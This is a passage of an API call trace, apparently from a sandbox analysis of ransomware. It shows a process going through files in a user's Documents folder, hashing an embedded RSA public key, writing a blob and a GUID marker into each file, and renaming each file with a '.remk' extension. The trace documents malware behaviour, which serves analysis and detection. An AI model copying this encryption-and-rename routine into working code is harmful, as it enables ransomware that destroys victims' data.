RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc630 [0235.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc5d0 [0235.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0235.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5a0 [0235.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0235.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc630 | out: hHeap=0x630000) returned 1 [0235.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0235.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0235.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.894] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x122b6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.894] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.895] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.895] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.895] CloseHandle (hObject=0x640) returned 1 [0235.900] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\d8nRRAoPzta8W1z.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\d8nrraopzta8w1z.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\d8nRRAoPzta8W1z.ods.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\d8nrraopzta8w1z.ods.remk")) returned 1 [0235.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.902] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.903] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1cfb550, ftCreationTime.dwHighDateTime=0x1d5d85f, ftLastAccessTime.dwLowDateTime=0xee64bda0, ftLastAccessTime.dwHighDateTime=0x1d5df8d, ftLastWriteTime.dwLowDateTime=0xee64bda0, ftLastWriteTime.dwHighDateTime=0x1d5df8d, nFileSizeHigh=0x0, nFileSizeLow=0x14374, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E76DZy.csv", cAlternateFileName="")) returned 1 [0235.903] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\E76DZy.csv") returned=".csv" [0235.903] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\E76DZy.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\e76dzy.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.904] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=82804) returned 1 [0235.904] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.907] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1434e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.907] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.909] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x14374, lpOverlapped=0x0) returned 1 [0235.910] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.910] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.910] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.910] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0235.911] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.911] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.911] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.911] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.911] GetLastError () returned 0x0 [0235.911] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.911] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0235.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.912] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.912] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.912] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.912] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5b8 | out: hHeap=0x630000) returned 1 [0235.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0235.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc618 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc5d0 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc5b8 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6d60 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5b8 | out: hHeap=0x630000) returned 1 [0235.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0235.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0235.914] GetCurrentThreadId () returned 0x314 [0235.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c50a0 [0235.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.914] GetCurrentThreadId () returned 0x314 [0235.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.916] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x14374, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.916] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.916] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.916] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.916] CloseHandle (hObject=0x640) returned 1 [0235.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0235.923] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\E76DZy.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\e76dzy.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\E76DZy.csv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\e76dzy.csv.remk")) returned 1 [0235.925] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40058b60, ftCreationTime.dwHighDateTime=0x1d5de9b, ftLastAccessTime.dwLowDateTime=0x965438b0, ftLastAccessTime.dwHighDateTime=0x1d5e51a, ftLastWriteTime.dwLowDateTime=0x965438b0, ftLastWriteTime.dwHighDateTime=0x1d5e51a, nFileSizeHigh=0x0, nFileSizeLow=0x8b9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pP1VM-.odt", cAlternateFileName="")) returned 1 [0235.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0235.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0235.925] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\pP1VM-.odt") returned=".odt" [0235.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\pP1VM-.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\pp1vm-.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.929] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=35742) returned 1 [0235.929] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.932] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8b78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.932] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.934] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x8b9e, lpOverlapped=0x0) returned 1 [0235.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.935] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0235.936] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.936] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.937] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.937] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.937] GetLastError () returned 0x0 [0235.937] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.937] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0235.937] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.937] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.937] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.937] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc630 | out: hHeap=0x630000) returned 1 [0235.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc630 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc5e8 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc5d0 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6d60 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 